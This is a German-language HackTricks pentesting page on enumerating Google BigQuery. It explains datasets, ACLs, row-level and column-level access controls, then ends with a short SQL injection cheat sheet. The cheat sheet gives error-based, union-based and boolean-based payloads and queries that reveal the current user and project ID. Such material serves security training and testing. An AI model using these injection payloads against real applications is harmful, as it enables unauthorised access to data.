GCP - Bigquery Enum
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Google Cloud BigQuery ist ein vollständig verwaltetes, serverloses Unternehmensdatenlager, das Funktionen für Analysen über Petabytes von Daten bietet und somit große Datensätze effizient verarbeitet. Als Platform as a Service (PaaS) bietet es Benutzern Infrastruktur und Werkzeuge zur Erleichterung des Datenmanagements, ohne dass manuelle Aufsicht erforderlich ist.
Es unterstützt Abfragen mit ANSI SQL. Die Hauptobjekte sind Datasets, die Tabellen mit SQL Daten enthalten.
Standardmäßig wird ein von Google verwalteter Verschlüsselungsschlüssel verwendet, obwohl es möglich ist, einen vom Kunden verwalteten Verschlüsselungsschlüssel (CMEK) zu konfigurieren. Es ist möglich, den Verschlüsselungsschlüssel pro Dataset und pro Tabelle innerhalb eines Datasets anzugeben.
Es ist möglich, eine Ablaufzeit im Dataset anzugeben, sodass jede neue Tabelle, die in diesem Dataset erstellt wird, nach der Erstellung automatisch nach der angegebenen Anzahl von Tagen gelöscht wird.
BigQuery ist tief in andere Google-Dienste integriert. Es ist möglich, Daten aus Buckets, Pub/Sub, Google Drive, RDS-Datenbanken usw. zu laden.
Wenn ein Dataset erstellt wird, werden ACLs angehängt, um den Zugriff darauf zu gewähren. Standardmäßig werden Besitzer-Berechtigungen dem Benutzer, der das Dataset erstellt hat, und dann Besitzer der Gruppe projectOwners (Besitzer des Projekts), Schreiber der Gruppe projectWriters und Leser der Gruppe projectReaders gewährt:
Es ist möglich, die Zeilen, auf die ein Principal innerhalb einer Tabelle zugreifen kann, mit Zeilenzugriffsrichtlinien zu steuern. Diese werden innerhalb der Tabelle mit DDL definiert. Die Zugriffsrichtlinie definiert einen Filter und nur die übereinstimmenden Zeilen mit diesem Filter sind für die angegebenen Principals zugänglich.
Um den Datenzugriff auf Spaltenebene einzuschränken:
Definieren Sie eine Taxonomie und Richtlinientags. Erstellen und verwalten Sie eine Taxonomie und Richtlinientags für Ihre Daten. https://console.cloud.google.com/bigquery/policy-tags
Optional: Gewähren Sie die Data Catalog Fine-Grained Reader-Rolle einem oder mehreren Benutzern für eines oder mehrere der von Ihnen erstellten Richtlinientags.
Weisen Sie Richtlinientags Ihren BigQuery-Spalten zu. Verwenden Sie in BigQuery Schema-Anmerkungen, um jedem Spalte, für die Sie den Zugriff einschränken möchten, ein Richtlinientag zuzuweisen.
Durchsetzen der Zugriffskontrolle auf der Taxonomie. Das Durchsetzen der Zugriffskontrolle bewirkt, dass die für alle Richtlinientags in der Taxonomie definierten Zugriffsbeschränkungen angewendet werden.
Verwalten Sie den Zugriff auf die Richtlinientags. Verwenden Sie Identity and Access Management (IAM)-Richtlinien, um den Zugriff auf jedes Richtlinientag einzuschränken. Die Richtlinie gilt für jede Spalte, die zum Richtlinientag gehört.
Wenn ein Benutzer versucht, zur Abfragezeit auf Spaltendaten zuzugreifen, überprüft BigQuery das Spaltenrichtlinientag und dessen Richtlinie, um festzustellen, ob der Benutzer berechtigt ist, auf die Daten zuzugreifen.
Zusammenfassend lässt sich sagen, dass Sie, um den Zugriff auf einige Spalten für einige Benutzer einzuschränken, ein Tag zur Spalte im Schema hinzufügen und den Zugriff der Benutzer auf das Tag einschränken, indem Sie die Zugriffskontrolle auf der Taxonomie des Tags durchsetzen.
Um die Zugriffskontrolle auf der Taxonomie durchzusetzen, ist es erforderlich, den Dienst zu aktivieren:
Es ist möglich, die Tags von Spalten mit:
Für weitere Informationen können Sie den Blogbeitrag überprüfen: https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac. Hier werden nur einige Details gegeben.
Kommentare:
select 1#from here it is not working
select 1/*between those it is not working*/
Aber nur das anfängliche wird nicht funktionieren
select 1--from here it is not working
Holen Sie Informationen über die Umgebung wie:
Aktueller Benutzer: select session_user()
Projekt-ID: select @@project_id
Reihen zusammenfügen:
Alle Tabellennamen: string_agg(table_name, ', ')
Holen Sie Datasets, Tabellen und Spalten Namen:
Projekt und Dataset Name:
Spalten und Tabellen Namen aller Tabellen des Datasets:
Andere Datensätze im selben Projekt:
SQL Injection-Typen:
Fehlerbasiert - Casting: select CAST(@@project_id AS INT64)
Fehlerbasiert - Division durch Null: ' OR if(1/(length((select('a')))-1)=1,true,false) OR '
Union-basiert (Sie müssen ALL in BigQuery verwenden): UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
Boolean-basiert: ' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'#
Potenziell zeitbasiert - Verwendung öffentlicher Datensätze Beispiel: SELECT * FROM `bigquery-public-data.covid19_open_data.covid19_open_data` LIMIT 1000
Dokumentation:
Skriptanweisungen: https://cloud.google.com/bigquery/docs/reference/standard-sql/scripting
Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)